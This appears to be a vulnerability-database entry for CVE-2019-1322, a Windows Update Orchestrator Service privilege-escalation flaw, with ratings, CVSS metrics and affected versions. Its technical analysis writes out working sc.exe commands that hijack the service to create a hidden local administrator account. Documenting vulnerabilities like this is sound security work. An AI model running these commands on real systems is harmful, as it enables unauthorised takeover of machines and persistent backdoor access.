Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local
0

CVE-2019-1322

Disclosure Date: October 10, 2019
CVE-2019-1322 CVSS v3 Base Score: 7.8
Exploited in the Wild
Reported by gwillcox-r7
View Source Details
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

An elevation of privilege vulnerability exists when Windows improperly handles authentication requests, aka ‘Microsoft Windows Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2019-1320, CVE-2019-1340.

Add Assessment

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Gives privileged access
Technical Analysis

This is an elevation of privilege vulnerability that exists when Windows improperly handles authentication requests by leveraging the Update Orchestrator Service. If an attacker successfully exploits this vulnerability they can run processes in an elevated context.

Prerequisite:

The Update Orchestrator Service runs as NT AUTHORITY\SYSTEM and any user in the group NT AUTHORITY\SERVICE have full access to modify the service.

It is known to affect Windows 10 1803 and above that have not been updated with the November 12th, 2019 security update patch (or above).

Exploitation:

Create tmpUser, add to local administrators group, and reset the service to its default state.

sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="cmd /c net user /add tmpUser tmpPassword123"
sc.exe start UsoSvc
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="cmd /c net localgroup Administrators /add tmpUser"
sc.exe start UsoSvc
sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="C:\Windows\System32\svchost.exe -k netsvcs -p"
sc.exe start UsoSvc
Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Windows 10 Version 1803 for 32-bit Systems
Windows 10 Version 1803 for x64-based Systems
Windows 10 Version 1803 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows Server version 1803 (Core Installation)
Windows Server 2019
Windows Server 2019 (Core installation)
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, version 1903 (Server Core installation)
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
exploit/windows/local/comahawk
Reporter
Unknown

Vendors

  • microsoft

Products

  • windows 10 1803,
  • windows 10 1809,
  • windows 10 1903,
  • windows server 2016 1803,
  • windows server 2016 1903,
  • windows server 2019 -

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis